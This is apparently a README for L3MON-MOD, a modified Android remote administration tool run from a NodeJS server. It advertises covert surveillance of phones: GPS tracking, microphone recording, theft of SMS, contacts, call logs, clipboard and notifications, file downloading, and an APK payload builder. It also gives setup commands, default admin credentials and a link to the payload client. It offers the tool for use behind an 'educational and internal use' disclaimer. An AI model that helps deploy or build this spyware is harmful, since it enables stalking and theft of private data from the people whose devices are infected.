A cloud based remote android managment suite, powered by NodeJS


  • GPS Logging
  • Microphone Recording
  • View Contacts
  • SMS Logs
  • Send SMS
  • Call Logs
  • View Installed Apps
  • View Stub Permissions
  • Live Clipboard Logging
  • Live Notification Logging
  • View WiFi Networks (logs previously seen)
  • File Explorer & Downloader
  • Command Queuing
  • Built In APK Builder


  • NodeJs
  • A Server

Runs on Localhost or Server

npm install

node index.js


npm start

Set Username & Password

Default login details:

    usermame: admin
    password: password

Change Password

1. Stop L3MON
2. Open `maindb.json` in a text editor
3. under `admin`
    - set the `username` as plain text
    - set the `password` as a LOWERCASE MD5 hash
4. save the file
5. run `npm start`
6. in your browser navigate to `http://<SERVER IP>`


  1. There is no online builder
  2. You have to buld or edit the payload using apk editor or Android Studio, the client is here (https://github.com/Basudev1/L3MON-Mod-Client)
  3. Will work on all platforms

Whats New

  1. Nothing new, fixed ejs errors
  2. Fixed dependency issues, vulnerabilities
  3. Fixed app crash after device restart ( New issue raised, used UUID, so each restart you will loose previous id)


  1. Location is always throws empty (even in the Original One)
  2. Null pointer error while using Device Id as an Identifier
  3. Waiting for your responses



All Credits goes to ORIGINAL LEMON author, though the project is archived and did not allow to contribute and XploitSpy has a backdoor, that's why I have to Mod this for you


We Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool.
L3MON-MOD is built for both Educational and Internal use ONLY.

Reborn with ❤️ By Techncyber
